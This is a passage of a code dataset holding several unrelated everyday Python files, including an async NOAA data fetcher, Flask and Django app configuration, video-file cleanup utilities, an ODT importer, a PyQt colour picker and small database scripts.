queue.put_nowait(_query)\n\n async def fetch_all(self):\n self._populate_queue(self.queue)\n\n tasks = []\n for i in range(self.n_workers):\n task = asyncio.create_task(self._worker(self.queue))\n tasks.append(task)\n print(f\"Created {len(tasks)} tasks...\")\n\n # Wait until the queue is fully processed.\n await self.queue.join()\n\n # Cancel our worker tasks.\n for task in tasks:\n task.cancel()\n\n # Wait until all worker tasks are cancelled.\n results = await asyncio.gather(*tasks, return_exceptions=True)\n\n for results in results: \n if results.__class__ == Exception:\n print(f\"Exception in worker: {results}\")\n continue\n\n print('==== DONE =====')\n print(f\"Total results processed: {self.results_processed} / {self.total_results}\")\n \n async def _worker(self, queue):\n print(\"Worker started...\")\n sleepytime = 1\n while True:\n try: \n async with httpx.AsyncClient() as client:\n sleep(sleepytime // 1000)\n query = await queue.get()\n df = None\n response = None\n try:\n response = await client.post('https://data.noaa.gov/onestop/api/search/search/collection', json=query)\n if response.status_code == 500:\n print(f\"Error while fetching: {response.status_code}\")\n sleepytime *= 2\n continue\n except Exception as e:\n print(f\"Exception while fetching: {e}\")\n with open(f\"./data/onestop/logs.txt\", 'a') as f:\n f.write(f\"{query} -> {e}\")\n continue\n \n try:\n data = response.json()\n df = pd.json_normalize(data['data'])\n dtypes = df.dtypes\n df['attributes.spatialBounding.coordinates'] = df['attributes.spatialBounding.coordinates'].astype(str)\n df['attributes.dataFormats'] = df['attributes.dataFormats'].astype(str)\n df['onestop_query'] = self.query_text\n self.results_processed += df.shape[0]\n df.to_parquet(f\"./data/onestop/{int(time())}.parquet\")\n except Exception as e:\n print(f\"Exception while writing to file: {str(e)}\")\n with open(f\"./data/onestop/logs.txt\", 'a') as f:\n f.write(f\"{query} -> {e}\")\n continue\n # failed_df = df[['id', 'onestop_query']].drop_duplicates()\n # failed_df = failed_df.assign(exception=str(e))\n\n # self.failed_writes = pd.concat([self.failed_writes, failed_df], ignore_index=True)\n \n self.queue.task_done()\n print(f\"Finished fetching query: {query['page']['offset'] // self.results_per_page}\")\n except asyncio.CancelledError:\n print(\"Worker cancelled...\")\n break\n except Exception as e:\n print(f\"Exception in worker: {e}\")\n break\n","repo_name":"FMurray/ocean-mind","sub_path":"datasets/fetchers.py","file_name":"fetchers.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"25379755841","text":"import os, random, string\nfrom dotenv import load_dotenv\n\n\n# basedir = os.path.abspath(os.path.dirname(__file__))\n\n# GEOCODING_APIKEY = os.getenv('GEOCODING_APIKEY', None)\n\n\nclass Config(object):\n\n basedir = os.path.abspath(os.path.dirname(__file__))\n\n dotenv_path = os.path.join(basedir, '.env')\n load_dotenv(dotenv_path)\n print(dotenv_path)\n print(os.listdir(basedir)) \n # Assets Management\n ASSETS_ROOT = os.getenv('ASSETS_ROOT', '/static/assets') \n \n # Set up the App SECRET_KEY\n SECRET_KEY = os.getenv('SECRET_KEY', None)\n if not SECRET_KEY:\n SECRET_KEY = ''.join(random.choice( string.ascii_lowercase ) for i in range( 32 )) \n\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n DB_ENGINE = os.getenv('DB_ENGINE' , None)\n DB_USERNAME = os.getenv('DB_USERNAME' , None)\n DB_PASS = os.getenv('DB_PASS' , None)\n DB_HOST = os.getenv('DB_HOST' , None)\n DB_PORT = os.getenv('DB_PORT' , None)\n DB_NAME = os.getenv('DB_NAME' , None)\n\n USE_SQLITE = True \n\n # try to set up a Relational DBMS\n if DB_ENGINE and DB_NAME and DB_USERNAME:\n\n try:\n \n # Relational DBMS: PSQL, MySql\n SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(\n DB_ENGINE,\n DB_USERNAME,\n DB_PASS,\n DB_HOST,\n DB_PORT,\n DB_NAME\n ) \n\n USE_SQLITE = False\n\n except Exception as e:\n\n print('> Error: DBMS Exception: ' + str(e) )\n print('> Fallback to SQLite ') \n\n if USE_SQLITE:\n\n # This will create a file in FOLDER\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'database', 'database.db')\n\n GEOCODING_APIKEY = os.getenv('GEOCODING_APIKEY', None)\n \n GEOJSON_FILE_PATH = os.path.join(basedir,'database', \"neighbourhoods.geojson\")\n\n RF_MODEL_PATH=os.path.join(basedir,'models', \"RatingEstimation_random_forest_model.joblib\")\n\n MF_MODEL_PATH=os.path.join(basedir,'models', \"SVD_matrix_factorization_model.surprise\")\n\n SVD_PARAM={\n 'n_factors': 100, \n 'n_epochs': 50, \n 'lr_all': 0.007, \n 'reg_all': 0.02, \n 'lr_bu': 0.005, \n 'lr_bi': 0.005, \n 'reg_bu': 0.02, \n 'reg_bi': 0.01, \n 'lr_pu': 0.01, \n 'lr_qi': 0.01, \n 'reg_pu': 0.01, \n 'reg_qi': 0.02\n } \n\n RECOMMEND_DEFAULT_TOPN=10\n\n ALPHA=0.7\n POI_COLUMNS = ['store', 'food', 'health', 'restaurant', 'hospital', 'lodging', 'finance', 'cafe', 'convenience_store', \n 'clothing_store', 'atm', 'shopping_mall', 'grocery_or_supermarket', 'home_goods_store', 'school', \n 'bakery', 'beauty_salon', 'transit_station', 'place_of_worship', 'pharmacy', 'meal_takeaway', \n 'furniture_store', 'tourist_attraction', 'secondary_school', 'supermarket', 'doctor', 'shoe_store', \n 'dentist', 'jewelry_store', 'church', 'bank', 'primary_school', 'electronics_store', 'gym', 'spa', \n 'car_repair', 'pet_store', 'bus_station', 'university', 'park', 'general_contractor', 'subway_station', \n 'real_estate_agency', 'florist', 'hair_care', 'department_store', 'hardware_store', 'car_dealer', \n 'veterinary_care', 'travel_agency', 'bicycle_store', 'book_store', 'laundry', 'plumber', \n 'meal_delivery', 'lawyer', 'parking', 'mosque', 'physiotherapist', 'art_gallery', 'insurance_agency', \n 'bar', 'museum', 'storage', 'movie_theater', 'moving_company', 'liquor_store', 'gas_station', \n 'electrician', 'car_rental', 'locksmith', 'car_wash', 'post_office', 'embassy', 'night_club', \n 'fire_station', 'amusement_park', 'library', 'hindu_temple', 'local_government_office', \n 'funeral_home', 'bowling_alley', 'cemetery', 'aquarium', 'roofing_contractor', 'stadium', 'painter', \n 'courthouse', 'drugstore', 'campground', 'accounting', 'airport', 'zoo', 'casino', 'synagogue', \n 'premise', 'taxi_stand', 'police', 'light_rail_station', 'city_hall', 'train_station', \n 'natural_feature', 'subpremise']\n SEMANTIC_GROUPS = {\n 'store_group': ['store', 'shopping_mall', 'grocery_or_supermarket', 'convenience_store', 'clothing_store', 'home_goods_store', 'electronics_store', 'department_store', 'furniture_store'],\n 'food_group': ['food', 'restaurant', 'cafe', 'bakery', 'meal_takeaway'],\n 'health_group': ['health', 'hospital', 'pharmacy', 'doctor', 'dentist', 'physiotherapist'],\n 'finance_group': ['finance', 'atm', 'bank', 'insurance_agency'],\n 'education_group': ['school', 'secondary_school', 'primary_school', 'university'],\n 'transportation_group': ['transit_station', 'bus_station', 'subway_station', 'taxi_stand', 'train_station', 'light_rail_station'],\n 'entertainment_group': ['movie_theater', 'amusement_park', 'bowling_alley', 'casino', 'night_club'],\n 'culture_group': ['museum', 'art_gallery', 'library', 'hindu_temple', 'church', 'mosque', 'synagogue'],\n 'recreation_group': ['park', 'gym', 'spa', 'stadium', 'zoo', 'aquarium'],\n 'services_group': ['laundry', 'plumber', 'lawyer', 'post_office', 'car_wash', 'embassy', 'police', 'funeral_home', 'moving_company']\n }\n\n COLORS = ['#8B0000', '#DC143C', '#FF7F50', '#CD5C5C', '#FA8072', '#FF8C00', '#FFD700', '#A52A2A', '#FF6347', '#FFA07A']\n MAP_CENTER=[1.3521, 103.8198] #center of Singapore\n\n\nclass ProductionConfig(Config):\n DEBUG = False\n\n # Security\n SESSION_COOKIE_HTTPONLY = True\n REMEMBER_COOKIE_HTTPONLY = True\n REMEMBER_COOKIE_DURATION = 3600\n\nclass DebugConfig(Config):\n DEBUG = True\n\n\n# Load all possible configurations\nconfig_dict = {\n 'Production': ProductionConfig,\n 'Debug' : DebugConfig\n}\n\n\n\n ","repo_name":"Leelinze/IRS-PM-2023-10-29-IS05FT-GRP3-Rental-Recommendation-Systems-in-Singapore","sub_path":"SystemCode/Rental-Recommendation-System-in-Singapore/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"34941608366","text":"import os\nfrom moviepy.editor import VideoFileClip\nimport cv2\nimport shutil\nimport sys\nimport json\n\nsys.path.append(os.path.join(os.getcwd(), 'configs'))\nfrom global_namespace import PATH_TO_PROJECT, PATH_TO_PERSISTENT_STORAGE,\\\n PATH_TO_LOCAL_DRIVE, PATH_TO_KINETICS_DATASET\n\n\ndef shifted_croped_filter(path):\n listOfFiles = get_list_of_mp4(path)\n for file in listOfFiles:\n if os.path.basename(file).startswith('('):\n os.remove(file)\ndef non_mp4_checker(path):\n listOfFiles = get_list_of_all_files(path)\n if False in [file.endswith('.mp4') for file in listOfFiles]:\n return True\n return False\ndef non_mp4_finder(path):\n out = []\n listOfFiles = get_list_of_all_files(path)\n for elem in listOfFiles:\n if not elem.endswith('.mp4'):\n out.append(elem)\n return out\ndef bad_duration_finder(path, low, high):\n out = []\n listOfFiles = get_list_of_mp4(path)\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n if clip.duration < low or clip.duration > high:\n out.append(elem)\n clip.close()\n except:\n pass\n return out\ndef bad_duration_filter(path, low, high):\n listOfFiles = get_list_of_mp4(path)\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n if clip.duration < low or clip.duration > high:\n os.remove(elem)\n clip.close()\n except:\n pass\ndef list_of_all_durations(path):\n listOfFiles = get_list_of_mp4(path)\n o = []\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n o.append(clip.duration)\n clip.close()\n except:\n pass\n return o\ndef list_of_all_fps(path):\n listOfFiles = get_list_of_mp4(path)\n o = []\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n o.append(clip.fps)\n clip.close()\n except:\n pass\n return o\ndef list_of_all_sizes(path):\n listOfFiles = get_list_of_mp4(path)\n o = []\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n o.append(clip.size)\n clip.close()\n except:\n pass\n return o\ndef list_of_all_nf(path):\n listOfFiles = get_list_of_mp4(path)\n o = []\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n cap = cv2.VideoCapture(elem)\n num_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n o.append(num_frames)\n cap.release()\n clip.close()\n except:\n pass\n return o\ndef bad_mp4_finder(path):\n out = []\n listOfFiles = get_list_of_mp4(path)\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n if clip.duration == 0 or clip.fps == 0:\n out.append(elem)\n clip.close()\n except:\n pass\n return out\ndef bad_mp4_filter(path):\n listOfFiles = get_list_of_mp4(path)\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n if clip.duration == 0 or clip.fps == 0:\n os.remove(elem)\n clip.close()\n except:\n pass\ndef get_list_of_mp4(path):\n listOfFiles = list()\n for (dirpath, dirnames, filenames) in os.walk(path):\n listOfFiles += [os.path.join(dirpath, file) for file in filenames if file.endswith('.mp4')]\n return listOfFiles\ndef get_list_of_all_files(path):\n listOfFiles = list()\n for (dirpath, dirnames, filenames) in os.walk(path):\n listOfFiles += [os.path.join(dirpath, file) for file in filenames]\n return listOfFiles\ndef corrupted_mp4_finder(path):\n out = []\n listOfFiles = get_list_of_mp4(path)\n for file in listOfFiles:\n try:\n clip = VideoFileClip(file)\n clip.close()\n except:\n out.append(file)\n return out\n\ndef if_exists_delete(path):\n if os.path.exists(path):\n shutil.rmtree(path)\n os.mkdir(path)\n else:\n os.mkdir(path)\n\ndef check_fetched(dataset_name):\n if os.path.exists(os.path.join(PATH_TO_PERSISTENT_STORAGE, dataset_name)):\n return True\n else:\n return False\n\ndef check_shifted(dataset_name):\n if os.path.exists(os.path.join(PATH_TO_PERSISTENT_STORAGE, dataset_name + '_exp')):\n return True\n else:\n return False\n\ndef log_fetched_dataset(dataset_name, lower_bound_duration=None, upper_bound_duration=None):\n path_to_dataset = os.path.join(PATH_TO_PERSISTENT_STORAGE, dataset_name)\n path_to_failed_files = os.path.join(path_to_dataset, 'info.txt')\n info = {}\n all_mp4s = get_list_of_mp4(path_to_dataset)\n non_mp4_files = non_mp4_finder(path_to_dataset)\n if lower_bound_duration is not None:\n bad_duration_files = bad_duration_finder(path_to_dataset, lower_bound_duration, upper_bound_duration)\n else:\n bad_duration_files = [None]\n all_durations = list_of_all_durations(path_to_dataset)\n all_fpss = list_of_all_fps(path_to_dataset)\n all_sizes = list_of_all_sizes(path_to_dataset)\n all_nfs = list_of_all_nf(path_to_dataset)\n corrupted_mp4s = corrupted_mp4_finder(path_to_dataset)\n with open(path_to_failed_files) as handler:\n failed_files = handler.readlines()\n info['all_durations'] = all_durations\n info['bad_duration_files'] = bad_duration_files\n info['non_mp4_files'] = non_mp4_files\n info['all_fpss'] = all_fpss\n info['all_sizes'] = all_sizes\n info['all_nfs'] = all_nfs\n info['corrupted_mp4s'] = corrupted_mp4s\n info['failed_files'] = failed_files\n info['all_mp4s'] = all_mp4s\n assert len(info['all_durations']) == len(info['all_fpss'])\n assert len(info['all_mp4s']) == len(info['all_fpss']) + len(info['corrupted_mp4s'])\n return info\n\ndef filter_fetched_data(exp_config, path):\n listOfFiles = get_list_of_mp4(path)\n cnts = [0, 0, 0]\n for elem in listOfFiles:\n if not elem.endswith('(t).mp4'):\n print('Not trimmed: ', elem)\n if 'train' in elem:\n cnts[0] += 1\n elif 'eval' in elem:\n cnts[1] += 1\n elif 'test' in elem:\n cnts[2] += 1\n print(cnts)\n os.remove(elem)\n try:\n clip = VideoFileClip(elem)\n if clip.duration < exp_config['dataset']['min_duration'] or clip.fps < exp_config['dataset']['min_fps']:\n print('Bad duration or fps (Deleted):', elem)\n if 'train' in elem:\n cnts[0] += 1\n elif 'eval' in elem:\n cnts[1] += 1\n elif 'test' in elem:\n cnts[2] += 1\n print(cnts)\n os.remove(elem)\n clip.close()\n except:\n print('Corrupted(Deleted):', elem)\n if 'train' in elem:\n cnts[0] += 1\n elif 'eval' in elem:\n cnts[1] += 1\n elif 'test' in elem:\n cnts[2] += 1\n print(cnts)\n os.remove(elem)\n\ndef number_of_examples(path):\n listOfFiles = get_list_of_mp4(path)\n return len(listOfFiles)","repo_name":"parsley9877/AVS","sub_path":"utils/sys/os_tools.py","file_name":"os_tools.py","file_ext":"py","file_size_in_byte":7257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8237760474","text":"\"\"\"Import module for odt source files.\"\"\"\n\nimport unicodedata\nimport xml.etree.ElementTree as etree\nimport zipfile\n\nfrom sparv.api import Config, SourceFilename, Output, Source, SourceStructure, Text, get_logger, importer, util\n\nlogger = get_logger(__name__)\n\n\n@importer(\"odt import\", file_extension=\"odt\", outputs=[\"text\"], text_annotation=\"text\", config=[\n Config(\"odt_import.prefix\", \"\", description=\"Optional prefix to add to annotation names.\"),\n Config(\"odt_import.keep_control_chars\", False, description=\"Set to True if control characters should not be \"\n \"removed from the text.\"),\n Config(\"odt_import.normalize\", \"NFC\", description=\"Normalize input using any of the following forms: \"\n \"'NFC', 'NFKC', 'NFD', and 'NFKD'.\")\n])\ndef parse(source_file: SourceFilename = SourceFilename(),\n source_dir: Source = Source(),\n prefix: str = Config(\"odt_import.prefix\"),\n keep_control_chars: bool = Config(\"odt_import.keep_control_chars\"),\n normalize: str = Config(\"odt_import.normalize\")) -> None:\n \"\"\"Parse odt file as input to the Sparv Pipeline.\n\n Args:\n source_file: The source filename.\n source_dir: The source directory.\n prefix: Optional prefix for output annotation.\n keep_control_chars: Set to True to keep control characters in the text.\n normalize: Normalize input text using any of the following forms: 'NFC', 'NFKC', 'NFD', and 'NFKD'.\n 'NFC' is used by default.\n \"\"\"\n source_file_path = str(source_dir.get_path(source_file, \".odt\"))\n\n # Parse odt and extract all text content\n text = OdtParser(source_file_path).text\n\n if not keep_control_chars:\n text = util.misc.remove_control_characters(text)\n\n if normalize:\n text = unicodedata.normalize(normalize, text)\n\n Text(source_file).write(text)\n\n # Make up a text annotation surrounding the whole file\n text_annotation = \"{}.text\".format(prefix) if prefix else \"text\"\n Output(text_annotation, source_file=source_file).write([(0, len(text))])\n SourceStructure(source_file).write([text_annotation])\n\n\nclass OdtParser():\n \"\"\"\n Parse an odt file and extract its text content.\n\n Inspired by https://github.com/deanmalmgren/textract\n \"\"\"\n\n def __init__(self, filename):\n self.filename = filename\n self.extract()\n\n def extract(self):\n \"\"\"Extract text content from odt file.\"\"\"\n # Get content XML file from ODT zip archive\n with open(self.filename, \"rb\") as stream:\n zip_stream = zipfile.ZipFile(stream)\n content = etree.fromstring(zip_stream.read(\"content.xml\"))\n # Iterate the XML and extract all strings\n self.text = \"\"\n for child in content.iter():\n if child.tag in [self.ns(\"text:p\"), self.ns(\"text:h\")]:\n self.text += self.get_text(child) + \"\\n\\n\"\n # Remove the final two linebreaks\n if self.text:\n self.text = self.text[:-2]\n\n def get_text(self, element):\n \"\"\"Recursively extract all text from element.\"\"\"\n buffer = \"\"\n if element.text is not None:\n buffer += element.text\n for child in element:\n if child.tag == self.ns(\"text:tab\"):\n buffer += \"\\t\"\n if child.tail is not None:\n buffer += child.tail\n elif child.tag == self.ns(\"text:s\"):\n buffer += \" \"\n if child.get(self.ns(\"text:c\")) is not None:\n buffer += \" \" * (int(child.get(self.ns(\"text:c\"))) - 1)\n if child.tail is not None:\n buffer += child.tail\n # Add placeholders for images\n elif child.tag == self.ns(\"drawing:image\"):\n image = child.get(self.ns(\"xmlns:href\"))\n if image:\n buffer += f\"----{image}----\"\n else:\n buffer += self.get_text(child)\n if element.tail is not None:\n buffer += element.tail\n return buffer\n\n def ns(self, tag):\n \"\"\"Get the name for 'tag' including its namespace.\"\"\"\n nsmap = {\n \"text\": \"urn:oasis:names:tc:opendocument:xmlns:text:1.0\",\n \"drawing\": \"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\",\n \"xmlns\": \"http://www.w3.org/1999/xlink\"\n }\n domain, tagname = tag.split(\":\")\n return f\"{{{nsmap[domain]}}}{tagname}\"\n","repo_name":"spraakbanken/sparv-pipeline","sub_path":"sparv/modules/odt_import/odt_import.py","file_name":"odt_import.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"51"} +{"seq_id":"262545313","text":"import numpy as np\nfrom PyQt5.QtGui import QPixmap, QMouseEvent, QColor, QLinearGradient, QBrush, QPalette\n\nfrom window.window import Ui_MainWindow\n\n\nclass ColorController:\n\n def __init__(self, win: Ui_MainWindow):\n self.win = win\n self.color = QColor()\n pixmap = QPixmap('window\\\\resources\\\\multicolored-circle.png')\n self.pixmap = pixmap.scaledToHeight(win.l_color_role.height())\n win.l_color_role.setPixmap(self.pixmap)\n win.l_color_role.mousePressEvent = self._get_pixel\n win.sl_saturation.valueChanged.connect(self._slider_change_event)\n win.sl_value.valueChanged.connect(self._slider_change_event)\n self._slider_change_event()\n self.set_gradient_in_saturation_slider()\n\n\n def _get_pixel(self, event: QMouseEvent):\n x = event.pos().x()\n y = event.pos().y()\n c = self.pixmap.toImage().pixel(x,y) # color code (integer): 3235912\n self.color.setRgba(c) # color object\n self.set_gradient_in_saturation_slider()\n self._slider_change_event(event)\n\n def set_gradient_in_saturation_slider(self):\n self.win.sl_saturation.setStyleSheet(f'''QSlider::groove:horizontal {{\n background:qlineargradient(x1:0, y1:0, x2:1, y2:0,\n stop:0 #fff, stop:1 rgb{self.color.getRgb()},);\n height: 10px;\n }}\n QSlider::handle::horizontal\n {{\n background: #333;\n width:8px;\n margin: -6px 0;\n }}\n ''')\n\n def _slider_change_event(self, event=None):\n self.color.setHsv(self.color.getHsv()[0], self.win.sl_saturation.value(), self.win.sl_value.value())\n self.win.l_current_color.setText(self.color.name().upper())\n text_color = QColor()\n if np.sum(self.color.getRgb()) > 470:\n text_color.setNamedColor('#000')\n else:\n text_color.setNamedColor('#fff')\n self.win.l_current_color.setStyleSheet(\n f'background-color:rgb{self.color.getRgb()}; color : rgb{text_color.getRgb()};')\n","repo_name":"IlyaLight/pyqt_color_picker","sub_path":"window/controllers/static_color.py","file_name":"static_color.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37633590889","text":"import uuid\nimport pickle\nimport jsonpickle\nclass Guitarra:\n\n\n def __init__(self, color, modelo, marca,\n madera_del_mastil='Roble', madera_del_diapason='Roble', precio=0,\n afinacion='RE', *args, **kargs):\n self.color= color\n self.marca = marca\n self.modelo = modelo\n self.serial = uuid.uuid4()\n self.afinacion = afinacion\n self.madera_del_mastil = madera_del_mastil\n self.madera_del_diapason = madera_del_diapason\n self.precio =precio\n\n\n def __str__(self):\n return f\"{self.serial}--{self.color}--{self.marca}--{self.modelo}\"\n\n def __repr__(self):\n return str(self.serial)\n def pintar(self, nuevo_color):\n self.color = nuevo_color\n\n\n def apreciar(self, nuevo_precio):\n self.precio = nuevo_precio\n\n def cumple(self, especificacion):\n dict_guitarra = self.__dict__\n for k in especificacion.get_keys():\n if k not in dict_guitarra or dict_guitarra[k] != especificacion.get_value(k):\n return False\n return True\n\n @classmethod\n def save(cls, guitarra):\n binary_open= open(str(guitarra.serial)+'.gui', mode='wb')\n pickle.dump(guitarra,binary_open)\n binary_open.close()\n\n @classmethod\n def load(cls, file_name):\n binary_open = open(file_name, mode='rb')\n guitarra=pickle.load(binary_open)\n binary_open.close()\n return guitarra\n\n @classmethod\n def save_json(cls, guitarra):\n text_open= open(str(guitarra.serial)+'.json', mode='w')\n json_gui=jsonpickle.encode(guitarra)\n text_open.write(json_gui)\n text_open.close()\n\n @classmethod\n def load_json(cls, file_name):\n text_open = open(file_name, mode='r')\n json_gui=text_open.readline()\n guitarra=jsonpickle.decode(json_gui)\n text_open.close()\n return guitarra","repo_name":"AlterCodex/PYTHON-EAM-2021-2","sub_path":"Clases/clase_23_09_2021/guitarra.py","file_name":"guitarra.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32532425529","text":"\"\"\"Seed module.\"\"\"\nfrom src.utilities.app_logger import logger\nfrom src.constants import REDIS_ADDRESS\nfrom src.backing_redis import redis_client\n\n\ndef seed_db():\n \"\"\"Seed the Backing Redis with some data.\"\"\"\n r = redis_client(redis_address=REDIS_ADDRESS)\n\n for i in range(1, 11):\n r.set(f\"seeded_key{i}\", f\"seeded_value_{i}\")\n\n logger.info(\"Seeded the Backing Redis with some data.\")\n\n\ndef clean_db():\n \"\"\"Clean the Backing Redis.\"\"\"\n r = redis_client(redis_address=REDIS_ADDRESS)\n for i in range(1, 11):\n r.delete(f\"seeded_key{i}\")\n\n logger.info(\"Cleaned the Backing Redis.\")\n","repo_name":"amirsalaar/redis-proxy","sub_path":"tests/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23615949663","text":"#给一个链表,若其中包含环,请找出该链表的环的入口结点,否则,输出null。\r\n#思路 遍历访问链表 记录地址 地址重复则为入口\r\n\r\nclass Solution:\r\n def EntryNodeOfLoop(self, pHead):\r\n li = []\r\n p = pHead\r\n while p!=None:\r\n if id(p) not in li:\r\n li.append(id(p))\r\n p = p.next\r\n else:\r\n return p","repo_name":"FireNoddles/-offer-","sub_path":"010. 链表中环的入口结点.py","file_name":"010. 链表中环的入口结点.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19290330250","text":"import motor.motor_asyncio\n\nfrom core.calculator import Calculator\n\nclient = motor.motor_asyncio.AsyncIOMotorClient(\"mongodb://mdb:27017\")\ndatabase = client[\"rpn_calculator\"]\noperations_collection = database[\"operations\"]\n\ncalc = Calculator()\n\nasync def connect():\n \"\"\"\n Establish a connection to the MongoDB database.\n \"\"\"\n try:\n await client.admin.command('ping')\n print(\"Connected to MongoDB\")\n except Exception as e:\n print(f\"Failed to connect to MongoDB: {e}\")\n raise e\n\nasync def close():\n \"\"\"\n Close the connection to the MongoDB database.\n \"\"\"\n if client:\n client.close()\n print(\"Closed MongoDB connection\")\n \ndef operation_helper(operation) -> dict:\n return {\n \"id\": str(operation[\"_id\"]),\n \"expression\": operation[\"expression\"],\n \"result\": operation[\"result\"],\n }\n\nasync def retrieve_all_operations():\n \"\"\"\n Retrieve all operations present in the database.\n \"\"\"\n operations = []\n async for operation in operations_collection.find():\n operations.append(operation_helper(operation))\n return operations\n\nasync def add_operation(operation_data: dict) -> dict:\n \"\"\"\n Add a new operation into to the database.\n \"\"\"\n operation = await operations_collection.insert_one(operation_data)\n new_operation = await operations_collection.find_one({\"_id\": operation.inserted_id})\n return operation_helper(new_operation)\n\nasync def delete_all_operations():\n \"\"\"\n Deletes all records from the 'operations' collection.\n \"\"\"\n await operations_collection.delete_many({})","repo_name":"Shynexiii/rpn-calculator-api","sub_path":"api/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17654880150","text":"import sqlalchemy as db\n\ndef teste1():\n \"\"\"\n Teste acessando diretamente ao banco\n \"\"\"\n engine = db.create_engine('sqlite:///test.sqlite') \n connection = engine.connect()\n metadata = db.MetaData()\n Emp = db.Table('emp', metadata,\n db.Column('Id',db.Integer()),\n db.Column('name', db.String(255),nullable=False),\n db.Column('salary', db.Float(), default=100.0),\n db.Column('active', db.Boolean(), default=True)\n )\n #metadata.create_all(engine)\n #Inserting record one by one\n #query = db.insert(Emp).values(Id=1, name='naveen', salary=60000.00, active=True)\n #ResultProxy = connection.execute(query)\n\n #Equivalent to 'SELECT * FROM census'\n query = db.select([Emp])\n ResultProxy = connection.execute(query)\n ResultSet = ResultProxy.fetchall()\n\n for elem in ResultSet:\n print(\"{name} {salary}\".format(name=elem.name, salary=elem.salary))\n\n\ndef teste2():\n \"\"\"\n Teste declarativa\n \"\"\"\n from database import db_session\n from models import User\n #u = User('admin', 'admin@localhost')\n #db_session.add(u)\n #db_session.commit()\n for x in User.query.all():\n print(\"Nome: {} [ {} ]\".format(x.name, x.email))\n user1 = User.query.filter(User.name == 'admin').first()\n print(\"Nome: {:30}: [ {} ]\".format(user1.name, user1.email))\n\n # Atualiza\n #user1.email = \"admin@teste\" \n #db_session.flush()\n #db_session.commit()\n\n #apagando\n #db_session.delete(user1)\n #db_session.commit()\n\n\n #query.filter(User.name.like('%ed%'))\n #query.filter(User.name.in_(['ed', 'wendy', 'jack']))\n #from sqlalchemy import and_\n #query.filter(and_(User.name == 'ed', User.fullname == 'Ed Jones'))\n #from sqlalchemy import or_\n #query.filter(or_(User.name == 'ed', User.name == 'wendy'))\n #query.filter(User.name.like('%ed')).count()\n\n\n\ndef teste2a():\n \"\"\"\n Iniciando o banco\n \"\"\"\n from database import init_db\n init_db()\n\n\nif __name__ == \"__main__\":\n teste2()\n","repo_name":"amk2/venv","sub_path":"ex09_teste_sqlalchemy.py","file_name":"ex09_teste_sqlalchemy.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36513741085","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('new/', views.new, name= 'new'),\n path('edit/', views.edit, name='edit'),\n path('detail/', views.detail, name = 'detail'),\n path('delete/', views.delete, name='delete'),\n path('/comment/create', views.comment_create, name=\"comment_create\"),\n path('/comment//delete', views.comment_delete, name=\"comment_delete\"),\n path('/comment//edit', views.comment_edit, name=\"comment_edit\"),\n]\n","repo_name":"Eunjijjang/saisai","sub_path":"saisai/board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21637043171","text":"# coding=utf-8\n\nimport xlrd\nimport json\nfrom pymongo import MongoClient\n\n# 连接数据库\nclient = MongoClient('localhost', 27017)\ndb = client.douban\naccount = db.movie_model\n\ndata = xlrd.open_workbook('douban_Top250.xls')\ntable = data.sheets()[0]\n# 读取excel第一行数据作为存入mongodb的字段名\nrowstag = table.row_values(0)\nnrows = table.nrows\nreturnData = {}\nfor i in range(1, nrows):\n # 将字段名和excel数据存储为字典形式,并转换为json格式\n returnData[i] = json.dumps(dict(zip(rowstag, table.row_values(i))))\n # 通过编解码还原数据\n returnData[i] = json.loads(returnData[i])\n account.insert_one(returnData[i])\nprint(\"数据保存到MongoDB数据库中成功!!!\")\n","repo_name":"TongGod/daily_code","sub_path":"爬虫项目/豆瓣电影TOP250分析/save_mongodb.py","file_name":"save_mongodb.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"20552965141","text":"from ring_doorbell import Ring\nimport time\nimport fhem\nimport logging\nfrom thread import start_new_thread, allocate_lock\n\n\n# CONFIG\nring_user = 'user@domain.com'\nring_pass = 'password'\nfhem_ip = '127.0.0.1'\nfhem_port = 7072 # Telnet Port\nlog_level = logging.DEBUG\nfhem_path = 